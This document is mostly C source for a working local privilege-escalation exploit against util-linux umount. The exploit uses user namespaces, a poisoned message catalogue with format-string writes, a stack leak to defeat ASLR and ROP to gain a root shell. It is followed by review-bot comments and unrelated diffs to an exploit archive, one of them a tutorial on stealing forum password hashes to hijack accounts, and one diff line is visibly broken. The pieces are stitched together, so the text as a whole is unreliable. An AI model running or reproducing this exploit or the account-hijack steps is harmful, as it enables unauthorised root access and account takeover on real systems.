char *writeString=(stringPos<0)?messageCataloguePreamble:transStringList[stringPos];
int length=strlen(writeString);
*preambleData++=length;
*preambleData++=(nextCatalogueStringStart-catalogueData);
memcpy(nextCatalogueStringStart, writeString, length+1);
nextCatalogueStringStart+=length+1;
}
assert(nextCatalogueStringStart-catalogueData==preambleLength+contentLength);
for(int stringPos=0; stringPos<=stringCount+1; stringPos++) {
// *preambleData++=(stringPos+1);
*preambleData++=(int[]){1, 3, 2, 0, 4}[stringPos];
}
*catalogueDataLength=preambleLength+contentLength;
return(catalogueData);
}
/** Create the catalogue data from the string lists and write
* it to the given file.
* @return 0 on success.
*/
int writeMessageCatalogue(char *pathName, char **origStringList,
char **transStringList, int stringCount) {
int catalogueFd=open(pathName, O_WRONLY|O_CREAT|O_TRUNC|O_NOCTTY, 0644);
if(catalogueFd<0) {
fprintf(stderr, "Failed to open catalogue file %s for writing.\n",
pathName);
return(-1);
}
int catalogueDataLength;
char *catalogueData=createMessageCatalogueData(
origStringList, transStringList, stringCount, &catalogueDataLength);
int result=write(catalogueFd, catalogueData, catalogueDataLength);
assert(result==catalogueDataLength);
close(catalogueFd);
free(catalogueData);
return(0);
}
void createDirectoryRecursive(char *namespaceMountBaseDir, char *pathName) {
char pathBuffer[PATH_MAX];
int pathNameLength=0;
while(1) {
char *nextPathSep=strchr(pathName+pathNameLength, '/');
if(nextPathSep) {
pathNameLength=nextPathSep-pathName;
} else {
pathNameLength=strlen(pathName);
}
int result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/%.*s",
namespaceMountBaseDir, pathNameLength, pathName);
assert(result<PATH_MAX);
result=mkdir(pathBuffer, 0755);
assert((!result)||(errno==EEXIST));
if(!pathName[pathNameLength])
break;
pathNameLength++;
}
}
/** This child function prepares the namespaced mount point and
* then waits to be killed later on.
*/
static int usernsChildFunction() {
while(geteuid()!=0) {
sched_yield();
}
int result=mount("tmpfs", "/tmp", "tmpfs", MS_MGC_VAL, NULL);
assert(!result);
assert(!chdir("/tmp"));
int handle=open("ready", O_WRONLY|O_CREAT|O_EXCL|O_NOFOLLOW|O_NOCTTY, 0644);
assert(handle>=0);
close(handle);
sleep(100000);
}
/** Prepare a process living in an own mount namespace and setup
* the mount structure appropriately. The process is created
* in a way allowing cleanup at program end by just killing it,
* thus removing the namespace.
* @return the pid of that process or -1 on error.
*/
pid_t prepareNamespacedProcess() {
if(namespacedProcessPid==-1) {
fprintf(stderr, "No pid supplied via command line, trying to create a namespace\nCAVEAT: /proc/sys/kernel/unprivileged_userns_clone must be 1 on systems with USERNS protection.\n");
char *stackData=(char*)malloc(1<<20);
assert(stackData);
namespacedProcessPid=clone(usernsChildFunction, stackData+(1<<20),
CLONE_NEWUSER|CLONE_NEWNS|SIGCHLD, NULL);
if(namespacedProcessPid==-1) {
fprintf(stderr, "USERNS clone failed: %d (%s)\n", errno, strerror(errno));
return(-1);
}
char idMapFileName[128];
char idMapData[128];
sprintf(idMapFileName, "/proc/%d/setgroups", namespacedProcessPid);
int setGroupsFd=open(idMapFileName, O_WRONLY);
assert(setGroupsFd>=0);
int result=write(setGroupsFd, "deny", 4);
assert(result>0);
close(setGroupsFd);
sprintf(idMapFileName, "/proc/%d/uid_map", namespacedProcessPid);
int uidMapFd=open(idMapFileName, O_WRONLY);
assert(uidMapFd>=0);
sprintf(idMapData, "0 %d 1\n", getuid());
result=write(uidMapFd, idMapData, strlen(idMapData));
assert(result>0);
close(uidMapFd);
sprintf(idMapFileName, "/proc/%d/gid_map", namespacedProcessPid);
int gidMapFd=open(idMapFileName, O_WRONLY);
assert(gidMapFd>=0);
sprintf(idMapData, "0 %d 1\n", getgid());
result=write(gidMapFd, idMapData, strlen(idMapData));
assert(result>0);
close(gidMapFd);
// After setting the maps for the child process, the child may
// start setting up the mount point. Wait for that to complete.
sleep(1);
fprintf(stderr, "Namespaced filesystem created with pid %d\n",
namespacedProcessPid);
}
osReleaseExploitData=osSpecificExploitDataList;
if(osRelease) {
// If an OS was detected, try to find it in list. Otherwise use
// default.
for(int tPos=0; osSpecificExploitDataList[tPos]; tPos+=4) {
if(!strcmp(osSpecificExploitDataList[tPos], osRelease)) {
osReleaseExploitData=osSpecificExploitDataList+tPos;
break;
}
}
}
char pathBuffer[PATH_MAX];
int result=snprintf(pathBuffer, sizeof(pathBuffer), "/proc/%d/cwd",
namespacedProcessPid);
assert(result<PATH_MAX);
char *namespaceMountBaseDir=strdup(pathBuffer);
assert(namespaceMountBaseDir);
// Create directories needed for umount to proceed to final state
// "not mounted".
createDirectoryRecursive(namespaceMountBaseDir, "(unreachable)/x");
result=snprintf(pathBuffer, sizeof(pathBuffer),
"(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES", osReleaseExploitData[2]);
assert(result<PATH_MAX);
createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
result=snprintf(pathBuffer, sizeof(pathBuffer),
"(unreachable)/tmp/%s/X.X/LC_MESSAGES", osReleaseExploitData[2]);
createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
result=snprintf(pathBuffer, sizeof(pathBuffer),
"(unreachable)/tmp/%s/X.x/LC_MESSAGES", osReleaseExploitData[2]);
createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
// Create symlink to trigger underflows.
result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/(unreachable)/tmp/down",
namespaceMountBaseDir);
assert(result<PATH_MAX);
result=symlink(osReleaseExploitData[1], pathBuffer);
assert(!result||(errno==EEXIST));
// getdate will leave that string in rdi to become the filename
// to execute for the next round.
char *selfPathName=realpath("/proc/self/exe", NULL);
result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/DATEMSK",
namespaceMountBaseDir);
assert(result<PATH_MAX);
int handle=open(pathBuffer, O_WRONLY|O_CREAT|O_TRUNC, 0755);
assert(handle>0);
result=snprintf(pathBuffer, sizeof(pathBuffer), "#!%s\nunused",
selfPathName);
assert(result<PATH_MAX);
result=write(handle, pathBuffer, result);
close(handle);
free(selfPathName);
// Write the initial message catalogue to trigger stack dumping
// and to make the "umount" call privileged by toggling the "restricted"
// flag in the context.
result=snprintf(pathBuffer, sizeof(pathBuffer),
"%s/(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES/util-linux.mo",
namespaceMountBaseDir, osReleaseExploitData[2]);
assert(result<PATH_MAX);
char *stackDumpStr=(char*)malloc(0x80+6*(STACK_LONG_DUMP_BYTES/8));
assert(stackDumpStr);
char *stackDumpStrEnd=stackDumpStr;
stackDumpStrEnd+=sprintf(stackDumpStrEnd, "AA%%%d$lnAAAAAA",
((int*)osReleaseExploitData[3])[ED_STACK_OFFSET_CTX]);
for(int dumpCount=(STACK_LONG_DUMP_BYTES/8); dumpCount; dumpCount--) {
memcpy(stackDumpStrEnd, "%016lx", 6);
stackDumpStrEnd+=6;
}
// We wrote allready 8 bytes, write so many more to produce a
// count of 'L' and write that to the stack. As all writes so
// sum up to a count aligned by 8, and 'L'==0x4c, we will have
// to write at least 4 bytes, which is longer than any "%hhx"
// format string output. Hence do not care about the byte content
// here. The target write address has a 16 byte alignment due
// to varg structure.
stackDumpStrEnd+=sprintf(stackDumpStrEnd, "%%1$%dhhx%%%d$hhn",
('L'-8-STACK_LONG_DUMP_BYTES*2)&0xff,
STACK_LONG_DUMP_BYTES/16);
*stackDumpStrEnd=0;
result=writeMessageCatalogue(pathBuffer,
(char*[]){
"%s: mountpoint not found",
"%s: not mounted",
"%s: target is busy\n (In some cases useful info about processes that\n use the device is found by lsof(8) or fuser(1).)"
},
(char*[]){"1234", stackDumpStr, "5678"},
3);
assert(!result);
free(stackDumpStr);
result=snprintf(pathBuffer, sizeof(pathBuffer),
"%s/(unreachable)/tmp/%s/X.X/LC_MESSAGES/util-linux.mo",
namespaceMountBaseDir, osReleaseExploitData[2]);
assert(result<PATH_MAX);
result=mknod(pathBuffer, S_IFIFO|0666, S_IFIFO);
assert((!result)||(errno==EEXIST));
secondPhaseTriggerPipePathname=strdup(pathBuffer);
result=snprintf(pathBuffer, sizeof(pathBuffer),
"%s/(unreachable)/tmp/%s/X.x/LC_MESSAGES/util-linux.mo",
namespaceMountBaseDir, osReleaseExploitData[2]);
secondPhaseCataloguePathname=strdup(pathBuffer);
free(namespaceMountBaseDir);
return(namespacedProcessPid);
}
/** Create the format string to write an arbitrary value to the
* stack. The created format string avoids to interfere with
* the complex fprintf format handling logic by accessing fprintf
* internal state on stack. Thus the modification method does
* not depend on that ftp internals. The current libc fprintf
* implementation copies values for formatting before applying
* the %n writes, therefore pointers changed by fprintf operation
* can only be utilized with the next fprintf invocation. As
* we cannot rely on a stack having a suitable number of pointers
* ready for arbitrary writes, we need to create those pointers
* one by one. Everything needed is pointer on stack pointing
* to another valid pointer and 4 helper pointers pointing to
* writeable memory. The **argv list matches all those requirements.
* @param printfArgvValuePos the position of the argv pointer from
* printf format string view.
* @param argvStackAddress the address of the argv list, where
* the argv[0] pointer can be read.
* @param printfArg0ValuePos the position of argv list containing
* argv[0..n] pointers.
* @param mainFunctionReturnAddress the address on stack where
* the return address from the main() function to _libc_start()
* is stored.
* @param writeValue the value to write to mainFunctionReturnAddress
*/
void createStackWriteFormatString(
char *formatBuffer, int bufferSize, int printfArgvValuePos,
void *argvStackAddress, int printfArg0ValuePos,
void *mainFunctionReturnAddress, unsigned short *writeData,
int writeDataLength) {
int result=0;
int currentValue=-1;
for(int nextWriteValue=0; nextWriteValue<0x10000;) {
// Find the lowest value to write.
nextWriteValue=0x10000;
for(int valuePos=0; valuePos<writeDataLength; valuePos++) {
int value=writeData[valuePos];
if((value>currentValue)&&(value<nextWriteValue))
nextWriteValue=value;
}
if(currentValue<0)
currentValue=0;
if(currentValue!=nextWriteValue) {
result=snprintf(formatBuffer, bufferSize, "%%1$%1$d.%1$ds",
nextWriteValue-currentValue);
formatBuffer+=result;
bufferSize-=result;
currentValue=nextWriteValue;
}
for(int valuePos=0; valuePos<writeDataLength; valuePos++) {
if(writeData[valuePos]==nextWriteValue) {
result=snprintf(formatBuffer, bufferSize,
"%%%d$hn", printfArg0ValuePos+valuePos+1);
formatBuffer+=result;
bufferSize-=result;
}
}
}
// Print the return function address location number of bytes
// except 8 (those from the LABEL counter) and write the value
// to arg1.
int writeCount=((int)mainFunctionReturnAddress-18)&0xffff;
result=snprintf(formatBuffer, bufferSize,
"%%1$%d.%ds%%1$s%%1$s%%%d$hn",
writeCount, writeCount, printfArg0ValuePos);
formatBuffer+=result;
bufferSize-=result;
// Write the LABEL 6 more times, thus multiplying the the single
// byte write pointer to an 8-byte aligned argv-list pointer and
// update argv[0] to point to argv[1..n].
writeCount=(((int)argvStackAddress)-(writeCount+56))&0xffff;
result=snprintf(formatBuffer, bufferSize,
"%%1$s%%1$s%%1$s%%1$s%%1$s%%1$s%%1$%d.%ds%%%d$hn",
writeCount, writeCount, printfArgvValuePos);
formatBuffer+=result;
bufferSize-=result;
// Append a debugging preamble.
result=snprintf(formatBuffer, bufferSize, "-%%35$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%78$s\n",
printfArgvValuePos, printfArg0ValuePos-1, printfArg0ValuePos,
printfArg0ValuePos+1, printfArg0ValuePos+2, printfArg0ValuePos+3,
printfArg0ValuePos+4, printfArg0ValuePos+5, printfArg0ValuePos+6);
formatBuffer+=result;
bufferSize-=result;
}
/** Wait for the trigger pipe to open. The pipe will be closed
* immediately after opening it.
* @return 0 when the pipe was opened before hitting a timeout.
*/
int waitForTriggerPipeOpen(char *pipeName) {
struct timespec startTime, currentTime;
int result=clock_gettime(CLOCK_MONOTONIC, &startTime);
startTime.tv_sec+=10;
assert(!result);
while(1) {
int pipeFd=open(pipeName, O_WRONLY|O_NONBLOCK);
if(pipeFd>=0) {
close(pipeFd);
break;
}
result=clock_gettime(CLOCK_MONOTONIC, &currentTime);
if(currentTime.tv_sec>startTime.tv_sec) {
return(-1);
}
currentTime.tv_sec=0;
currentTime.tv_nsec=100000000;
nanosleep(&currentTime, NULL);
}
return(0);
}
/** Invoke umount to gain root privileges.
* @return 0 if the umount process terminated with expected exit
* status.
*/
int attemptEscalation() {
int escalationSuccess=-1;
char targetCwd[64];
snprintf(
targetCwd, sizeof(targetCwd)-1, "/proc/%d/cwd", namespacedProcessPid);
int pipeFds[2];
int result=pipe(pipeFds);
assert(!result);
pid_t childPid=fork();
assert(childPid>=0);
if(!childPid) {
// This is the child process.
close(pipeFds[0]);
fprintf(stderr, "Starting subprocess\n");
dup2(pipeFds[1], 1);
dup2(pipeFds[1], 2);
close(pipeFds[1]);
result=chdir(targetCwd);
assert(!result);
// Create so many environment variables for a kind of "stack spraying".
int envCount=UMOUNT_ENV_VAR_COUNT;
char **umountEnv=(char**)malloc((envCount+1)*sizeof(char*));
assert(umountEnv);
umountEnv[envCount--]=NULL;
umountEnv[envCount--]="LC_ALL=C.UTF-8";
while(envCount>=0) {
umountEnv[envCount--]="AANGUAGE=X.X";
}
// Use the built-in C locale.
// Invoke umount first by overwriting heap downwards using links
// for "down", then retriggering another error message ("busy")
// with hopefully similar same stack layout for other path "/".
char* umountArgs[]={umountPathname, "/", "/", "/", "/", "/", "/", "/", "/", "/", "/", "down", "LABEL=78", "LABEL=789", "LABEL=789a", "LABEL=789ab", "LABEL=789abc", "LABEL=789abcd", "LABEL=789abcde", "LABEL=789abcdef", "LABEL=789abcdef0", "LABEL=789abcdef0", NULL};
result=execve(umountArgs[0], umountArgs, umountEnv);
assert(!result);
}
close(pipeFds[1]);
int childStdout=pipeFds[0];
int escalationPhase=0;
char readBuffer[1024];
int readDataLength=0;
char stackData[STACK_LONG_DUMP_BYTES];
int stackDataBytes=0;
struct pollfd pollFdList[1];
pollFdList[0].fd=childStdout;
pollFdList[0].events=POLLIN;
// Now learn about the binary, prepare data for second exploitation
// phase. The phases should be:
// * 0: umount executes, glibc underflows and causes an util-linux.mo
// file to be read, that contains a poisonous format string.
// Successful poisoning results in writing of 8*'A' preamble,
// we are looking for to indicate end of this phase.
// * 1: The poisoned process writes out stack content to defeat
// ASLR. Reading all relevant stack end this phase.
// * 2: The poisoned process changes the "LANGUAGE" parameter,
// thus triggering re-read of util-linux.mo. To avoid races,
// we let umount open a named pipe, thus blocking execution.
// As soon as the pipe is ready for writing, we write a modified
// version of util-linux.mo to another file because the pipe
// cannot be used for sending the content.
// * 3: We read umount output to avoid blocking the process and
// wait for it to ROP execute fchown/fchmod and exit.
while(1) {
if(escalationPhase==2) {
// We cannot use the standard poll from below to monitor the pipe,
// but also we do not want to block forever. Wait for the pipe
// in nonblocking mode and then continue with next phase.
result=waitForTriggerPipeOpen(secondPhaseTriggerPipePathname);
if(result) {
goto attemptEscalationCleanup;
}
escalationPhase++;
}
// Wait at most 10 seconds for IO.
result=poll(pollFdList, 1, 10000);
if(!result) {
// We ran into a timeout. This might be the result of a deadlocked
// child, so kill the child and retry.
fprintf(stderr, "Poll timed out\n");
goto attemptEscalationCleanup;
}
// Perform the IO operations without blocking.
if(pollFdList[0].revents&(POLLIN|POLLHUP)) {
result=read(
pollFdList[0].fd, readBuffer+readDataLength,
sizeof(readBuffer)-readDataLength);
if(!result) {
if(escalationPhase<3) {
// Child has closed the socket unexpectedly.
goto attemptEscalationCleanup;
}
break;
}
if(result<0) {
fprintf(stderr, "IO error talking to child\n");
goto attemptEscalationCleanup;
}
readDataLength+=result;
// Handle the data depending on escalation phase.
int moveLength=0;
switch(escalationPhase) {
case 0: // Initial sync: read A*8 preamble.
if(readDataLength<8)
continue;
char *preambleStart=memmem(readBuffer, readDataLength,
"AAAAAAAA", 8);
if(!preambleStart) {
// No preamble, move content only if buffer is full.
if(readDataLength==sizeof(readBuffer))
moveLength=readDataLength-7;
break;
}
// We found, what we are looking for. Start reading the stack.
escalationPhase++;
moveLength=preambleStart-readBuffer+8;
case 1: // Read the stack.
// Consume stack data until or local array is full.
while(moveLength+16<=readDataLength) {
result=sscanf(readBuffer+moveLength, "%016lx",
(int*)(stackData+stackDataBytes));
if(result!=1) {
// Scanning failed, the data injection procedure apparently did
// not work, so this escalation failed.
goto attemptEscalationCleanup;
}
moveLength+=sizeof(long)*2;
stackDataBytes+=sizeof(long);
// See if we reached end of stack dump already.
if(stackDataBytes==sizeof(stackData))
break;
}
if(stackDataBytes!=sizeof(stackData))
break;
// All data read, use it to prepare the content for the next phase.
fprintf(stderr, "Stack content received, calculating next phase\n");
int *exploitOffsets=(int*)osReleaseExploitData[3];
// This is the address, where source Pointer is pointing to.
void *sourcePointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]];
// This is the stack address source for the target pointer.
void *sourcePointerLocation=sourcePointerTarget-0xd0;
void *targetPointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARG0]];
// This is the stack address of the libc start function return
// pointer.
void *libcStartFunctionReturnAddressSource=sourcePointerLocation-0x10;
fprintf(stderr, "Found source address location %p pointing to target address %p with value %p, libc offset is %p\n",
sourcePointerLocation, sourcePointerTarget,
targetPointerTarget, libcStartFunctionReturnAddressSource);
// So the libcStartFunctionReturnAddressSource is the lowest address
// to manipulate, targetPointerTarget+...
void *libcStartFunctionAddress=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]-2];
void *stackWriteData[]={
libcStartFunctionAddress+exploitOffsets[ED_LIBC_GETDATE_DELTA],
libcStartFunctionAddress+exploitOffsets[ED_LIBC_EXECL_DELTA]
};
fprintf(stderr, "Changing return address from %p to %p, %p\n",
libcStartFunctionAddress, stackWriteData[0],
stackWriteData[1]);
escalationPhase++;
char *escalationString=(char*)malloc(1024);
createStackWriteFormatString(
escalationString, 1024,
exploitOffsets[ED_STACK_OFFSET_ARGV]+1, // Stack position of argv pointer argument for fprintf
sourcePointerTarget, // Base value to write
exploitOffsets[ED_STACK_OFFSET_ARG0]+1, // Stack position of argv[0] pointer ...
libcStartFunctionReturnAddressSource,
(unsigned short*)stackWriteData,
sizeof(stackWriteData)/sizeof(unsigned short)
);
fprintf(stderr, "Using escalation string %s", escalationString);
result=writeMessageCatalogue(
secondPhaseCataloguePathname,
(char*[]){
"%s: mountpoint not found",
"%s: not mounted",
"%s: target is busy\n (In some cases useful info about processes that\n use the device is found by lsof(8) or fuser(1).)"
},
(char*[]){
escalationString,
"BBBB5678%3$s\n",
"BBBBABCD%s\n"},
3);
assert(!result);
break;
case 2:
case 3:
// Wait for pipe connection and output any result from mount.
readDataLength=0;
break;
default:
fprintf(stderr, "Logic error, state %d\n", escalationPhase);
goto attemptEscalationCleanup;
}
if(moveLength) {
memmove(readBuffer, readBuffer+moveLength, readDataLength-moveLength);
readDataLength-=moveLength;
}
}
}
attemptEscalationCleanup:
// Wait some time to avoid killing umount even when exploit was
// successful.
sleep(1);
close(childStdout);
// It is safe to kill the child as we did not wait for it to finish
// yet, so at least the zombie process is still here.
kill(childPid, SIGKILL);
pid_t waitedPid=waitpid(childPid, NULL, 0);
assert(waitedPid==childPid);
return(escalationSuccess);
}
/** This function invokes the shell specified via environment
* or the default shell "/bin/sh" when undefined. The function
* does not return on success.
* @return -1 on error
*/
int invokeShell(char *shellName) {
if(!shellName)
shellName=getenv("SHELL");
if(!shellName)
shellName="/bin/sh";
char* shellArgs[]={shellName, NULL};
execve(shellName, shellArgs, environ);
fprintf(stderr, "Failed to launch shell %s\n", shellName);
return(-1);
}
int main(int argc, char **argv) {
char *programmName=argv[0];
int exitStatus=1;
if(getuid()==0) {
fprintf(stderr, "%s: you are already root, invoking shell ...\n",
programmName);
invokeShell(NULL);
return(1);
}
if(geteuid()==0) {
struct stat statBuf;
int result=stat("/proc/self/exe", &statBuf);
assert(!result);
if(statBuf.st_uid||statBuf.st_gid) {
fprintf(stderr, "%s: internal invocation, setting SUID mode\n",
programmName);
int handle=open("/proc/self/exe", O_RDONLY);
fchown(handle, 0, 0);
fchmod(handle, 04755);
exit(0);
}
fprintf(stderr, "%s: invoked as SUID, invoking shell ...\n",
programmName);
setresgid(0, 0, 0);
setresuid(0, 0, 0);
invokeShell(NULL);
return(1);
}
for(int argPos=1; argPos<argc;) {
char *argName=argv[argPos++];
if(argPos==argc) {
fprintf(stderr, "%s requires parameter\n", argName);
return(1);
}
if(!strcmp("--Pid", argName)) {
char *endPtr;
namespacedProcessPid=strtoll(argv[argPos++], &endPtr, 10);
if((errno)||(*endPtr)) {
fprintf(stderr, "Invalid pid value\n");
return(1);
}
killNamespacedProcessFlag=0;
} else {
fprintf(stderr, "Unknown argument %s\n", argName);
return(1);
}
}
fprintf(stderr, "%s: setting up environment ...\n", programmName);
if(!osRelease) {
if(detectOsRelease()) {
fprintf(stderr, "Failed to detect OS version, continuing anyway\n");
}
}
umountPathname=findUmountBinaryPathname("/bin");
if((!umountPathname)&&(getenv("PATH")))
umountPathname=findUmountBinaryPathname(getenv("PATH"));
if(!umountPathname) {
fprintf(stderr, "Failed to locate \"umount\" binary, is PATH correct?\n");
goto preReturnCleanup;
}
fprintf(stderr, "%s: using umount at \"%s\".\n", programmName,
umountPathname);
pid_t nsPid=prepareNamespacedProcess();
if(nsPid<0) {
goto preReturnCleanup;
}
// Gaining root can still fail due to ASLR creating additional
// path separators in memory addresses residing in area to be
// overwritten by buffer underflow. Retry regaining until this
// executable changes uid/gid.
int escalateMaxAttempts=10;
int excalateCurrentAttempt=0;
while(excalateCurrentAttempt<escalateMaxAttempts) {
excalateCurrentAttempt++;
fprintf(stderr, "Attempting to gain root, try %d of %d ...\n",
excalateCurrentAttempt, escalateMaxAttempts);
attemptEscalation();
struct stat statBuf;
int statResult=stat("/proc/self/exe", &statBuf);
int stat(const char *pathname, struct stat *buf);
if(statResult) {
fprintf(stderr, "Failed to stat /proc/self/exe: /proc not mounted, access restricted, executable deleted?\n");
break;
}
if(statBuf.st_uid==0) {
fprintf(stderr, "Executable now root-owned\n");
goto escalateOk;
}
}
fprintf(stderr, "Escalation FAILED, maybe target system not (yet) supported by exploit!\n");
preReturnCleanup:
if(namespacedProcessPid>0) {
if(killNamespacedProcessFlag) {
kill(namespacedProcessPid, SIGKILL);
} else {
// We used an existing namespace or chroot to escalate. Remove
// the files created there.
fprintf(stderr, "No namespace cleanup for preexisting namespaces yet, do it manually.\n");
}
}
if(!exitStatus) {
fprintf(stderr, "Cleanup completed, re-invoking binary\n");
invokeShell("/proc/self/exe");
exitStatus=1;
}
return(exitStatus);
escalateOk:
exitStatus=0;
goto preReturnCleanup;
}
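
Review bot: In `main()`, the line `int stat(const char *pathname, struct stat *buf);` that follows the `stat("/proc/self/exe", &statBuf)` call inside the retry loop is a stray prototype, apparently pasted from the man page, and should be dropped. In the same file, `attemptEscalation()` initialises `escalationSuccess=-1` and never assigns it again, so the function always returns -1 and `main()` ignores the result; make it `void` or remove the variable. The `--Pid` handling tests `errno` after `strtoll()` without setting it to 0 beforehand, so a stale error value can reject a valid pid. The doc comment on `createStackWriteFormatString()` describes a `writeValue` parameter, while the signature takes `formatBuffer`, `bufferSize`, `writeData` and `writeDataLength`, none of which are documented.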

@ -1,4 +1,4 @@
# Reference: http://www.milw0rm.com/id.php?id=1231 (kcope) /str0ke
# Reference: http://www.milw0rm.com/id.php?id=1231 (https://www.exploit-db.com/exploits/1231/) (kcope) /str0ke
#
# Metasploit plugin for: Wzdftpd SITE Command Arbitrary Command Execution

@ -2,13 +2,13 @@
Tutorial for the recent exploit released by Petey Beege.
1. Get the exploit from http://www.milw0rm.com/id.php?id=1013
1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
2. Make sure you have LWP::UserAgent perl module if not do this:
a. perl -MCPAN -e 'shell'
b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id
ex. inv.pl http://forums.elitesite.com 2 2
ex. inv.pl http://forums.example.com 2 2
Where 2 is the login id and 2 for version 2 of IPB.
@ -18,13 +18,13 @@ C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb
Add the following entries:
forums.elitesite.com FALSE / FALSE 1148708747 member_id 1
forums.elitesite.com FALSE / FALSE 1148708747 pass_hash ecb735f70028a9cdb819828f4aced78c
forums.example.com FALSE / FALSE 1148708747 member_id 1
forums.example.com FALSE / FALSE 1148708747 pass_hash ecb735f70028a9cdb819828f4aced78c
Notice the value of member_id and pass_hash taken from the values
generated by the exploit.
5. Fire up Mozilla Firefox and login to http://forums.elitesite.com
5. Fire up Mozilla Firefox and login to http://forums.example.com
Enjoy!
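
Review bot: The hostname is swapped for `forums.example.com`, but the `pass_hash` cookie line keeps the original 32-character hash value, and the hunk header context still shows a local Firefox profile path under a named Windows user directory. If the intent of this change is to stop pointing at a real site and account, replace the hash with an obvious placeholder in the same edit and decide whether the profile path should get the same treatment.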

@ -3,7 +3,7 @@
#
# Flatnuke 2.5.6 privilege escalation / remote commands execution exploit
# (works with magic_quotes_gpc off, try this with 2.5.5:
# http://www.milw0rm.com/id.php?id=1140)
# http://www.milw0rm.com/id.php?id=1140 (https://www.exploit-db.com/exploits/1140/))
#
# coded by rgod at http://rgod.altervista.org
# mail: retrogod at aliceposta it

@ -1,4 +1,4 @@
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103 (https://www.exploit-db.com/exploits/1103/)
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

@ -8,7 +8,7 @@ _______________________________________________________________________________
iS; .sS* Copyright (C) 2003-2005 by Berend-Jan Wever.
.SS sSSSSSSP <berendjanwever@gmail.com>
_______________________________________________________________________________
Official release: http://www.milw0rm.com/id.php?id=1224
Official release: http://www.milw0rm.com/id.php?id=1224 (https://www.exploit-db.com/exploits/1224/)
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
@ -224,7 +224,7 @@ _______________________________________________________________________________
"<H2>Exploit</H2>" +
"Attack URL (size: " +
number(sURL.length*2) + " bytes):<BR>" +
"&quot;" + escape(sURL) + "&quot;<BR><BR>";
""" + escape(sURL) + ""<BR><BR>";
// Ask if you want to get pwned
exploitStatusElement.innerHTML =
"<BUTTON onclick=\"FiredFox();\">" +

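Review bot: The replacement line `""" + escape(sURL) + ""<BR><BR>";` has had its `&quot;` entities decoded into literal double quotes, so it no longer parses as a JavaScript string expression. The entities in the removed line were part of the HTML the script generates, not an encoding artefact, so that line should stay exactly as it was; only the "Official release" URL in the file header needed the exploit-db reference added.
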
@ -156,6 +156,6 @@ int main(int argc, char **argv)
//2004-10-23
//Ability Server 2.34 and below Remote APPE Buffer Overflow Exploit
//KaGra
//http://www.milw0rm.com/id.php?id=592
//http://www.milw0rm.com/id.php?id=592 (https://www.exploit-db.com/exploits/592/)
// milw0rm.com [2004-12-16]

@ -5255,6 +5255,7 @@ id,file,description,date,author,type,platform,port
43718,exploits/windows/dos/43718.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Write",2018-01-17,"Google Security Research",dos,windows,
43720,exploits/windows/dos/43720.js,"Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read",2018-01-17,"Google Security Research",dos,windows,
43723,exploits/windows/dos/43723.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy",2018-01-17,"Google Security Research",dos,windows,
43776,exploits/hardware/dos/43776.py,"Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service",2018-01-18,"Scott Gayou",dos,hardware,
40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@ -5680,7 +5681,7 @@ id,file,description,date,author,type,platform,port
42361,exploits/multiple/dos/42361.html,"WebKit - 'WebCore::AccessibilityRenderObject::handleAriaExpandedChanged' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
42362,exploits/multiple/dos/42362.html,"WebKit - 'WebCore::Node::nextSibling' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
42363,exploits/multiple/dos/42363.html,"WebKit - 'WebCore::RenderSearchField::addSearchResult' Heap Buffer Overflow",2017-07-24,"Google Security Research",dos,multiple,
42364,exploits/multiple/dos/42364.html,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
42364,exploits/multiple/dos/42364.html,"WebKit - 'WebCore::InputType::element' Use-After-Free (1)",2017-07-24,"Google Security Research",dos,multiple,
42365,exploits/multiple/dos/42365.html,"WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
42366,exploits/multiple/dos/42366.html,"WebKit - 'WebCore::Node::getFlag' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
42367,exploits/multiple/dos/42367.html,"WebKit - 'WebCore::getCachedWrapper' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple,
@ -5790,7 +5791,7 @@ id,file,description,date,author,type,platform,port
43164,exploits/hardware/dos/43164.py,"Vonage VDV-23 - Denial of Service",2017-11-21,Nu11By73,dos,hardware,
43165,exploits/windows/dos/43165.cpp,"Microsoft Windows 10 - 'nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry)' Pool Memory Disclosure",2017-11-21,"Google Security Research",dos,windows,
43166,exploits/multiple/dos/43166.js,"WebKit - 'WebCore::TreeScope::documentScope' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
